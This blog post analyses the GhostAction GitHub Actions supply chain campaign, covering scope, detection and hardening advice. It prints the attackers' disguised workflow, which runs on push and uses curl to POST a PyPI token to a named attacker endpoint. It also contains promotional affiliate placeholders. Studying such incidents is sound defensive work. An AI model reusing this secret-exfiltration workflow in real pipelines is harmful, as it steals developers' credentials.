GhostAction Attack: Secrets Stolen at Scale in GitHub Supply Chain Attack By CyberDudeBivash – Cybersecurity, AI & Threat Intelligence Network

Published on: cyberdudebivash.com · cyberbivash.blogspot.com


Overview

The GhostAction campaign represents a major escalation in GitHub Actions-based supply chain threats. On September 5, 2025, GitGuardian revealed a coordinated attack that stole 3,325 secrets from 327 compromised GitHub users, across 817 repositories by injecting malicious workflows into the CI/CD pipelines GitGuardian BlogCSO Online.


Technical Breakdown

Attack Vector & Workflow Injection

Attackers leveraged compromised developer accounts to push a malicious GitHub Actions workflow, deceptively named “Add GitHub Actions Security workflow.” Triggered on push and workflow_dispatch, it contained steps that harvested secrets—such as PyPI tokens—via a curl -X POST command to an attacker-controlled endpoint GitGuardian BlogStepSecurity.

Snapshot of the Malicious Workflow:

name: Github Actions Security
on:
  workflow_dispatch:
  push:
jobs:
  send-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV
      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' hxxps://bold-dhawan.45-139-104-115.plesk.page


Scope of Impact

MetricValue
Compromised Users327 GitHub users
Affected Repositories817 repos
Total Stolen Secrets3,325 API tokens, credentials
Exfiltration Endpointhxxps://bold-dhawan[.]plesk[.]page resolving to IP 45.139.104.115 GitGuardian Blogcybersixt.com
Common Sensitive TokensPyPI, npm, DockerHub, AWS, GitHub, Sonar, Confluence tokens SC MediaSecurityWeek

Despite the potential, no malicious PyPI or npm package distributions were detected during the compromise window GitGuardian BlogCSO Online.


Attack Detection & Remediation

  • FastUUID, the original compromised project, was moved to read-only on PyPI within minutes, and the malicious workflow was reverted GitGuardian Blog.
  • GitGuardian alerted affected developers (573 projects were contacted) and coordinated with security teams at GitHub, npm, and PyPI CSO OnlineSC Media.
  • A subset of packages remained at risk: 9 npm and 15 PyPI packages potentially vulnerable to misuse of leaked tokens CSO OnlineSecurityWeek.

What This Means for Supply Chain Security

  • CI/CD pipelines are under fire: Workflow files with embedded secrets are high-value targets.
  • Automation abuse is stealthy: Simple YAML injections evade detection when named innocuously.
  • Token-based attacks scale fast: Hundreds of developers and repositories are at risk in minutes.

CyberDudeBivash Countermeasure Framework

  1. Secure Secrets in CI/CD
    • Use ephemeral tokens, vault-based secrets (e.g., GitHub Secrets, HashiCorp Vault), and never embed credentials in workflows.
    • Require code reviews and workflow change reviews before merge.
  2. Audit Workflows & Enforce Branch Protection
    • Use GitHub’s Protected Branches and Workflow Approval to require approval on modifications.
    • Leverage secret scanning tools to flag exposed tokens before execution.
  3. Harden CI/CD Environments
    • Enforce least privilege access to CI/CD systems.
    • Rotate all potentially compromised tokens immediately.
    • Use IP allowlists and dedicated service accounts.
  4. Monitoring & Response
    • Setup alerts for workflow changes, suspicious HTTP POSTs, or new secrets being added.
    • Collaborate with registries like PyPI/npm for proactive detection of unauthorized packages.

Affiliate Integration & Brand Authority

  • Build your CI/CD security labs on rock-solid hosting:
    • Hostinger – Speed + Built-in security → [Your Hostinger affiliate link]
    • Bluehost – SEO ready for dev/security blogs → [Your Bluehost affiliate link]
    • DigitalOcean – Developer-first cloud environment → [Your DigitalOcean affiliate link]
  • CyberDudeBivash Services offers:
    • CI/CD pipeline audits
    • Secrets strategy + implementation
    • Workflow security hardening
    • Incident triage and response

Access help and consultancy at cyberdudebivash.com or through our contact form.


Hashtags for Promotion

#GhostAction #SupplyChainAttack #GitHubActions #SecretExfiltration #DevSecOps #CI_CD #CyberDudeBivash #GitGuardian #SoftwareSupplyChain #TokenSecurity #CloudSecurity #IncidentResponse #Cybersecurity #BrandAuthority

Leave a comment

Design a site like this with WordPress.com
Get started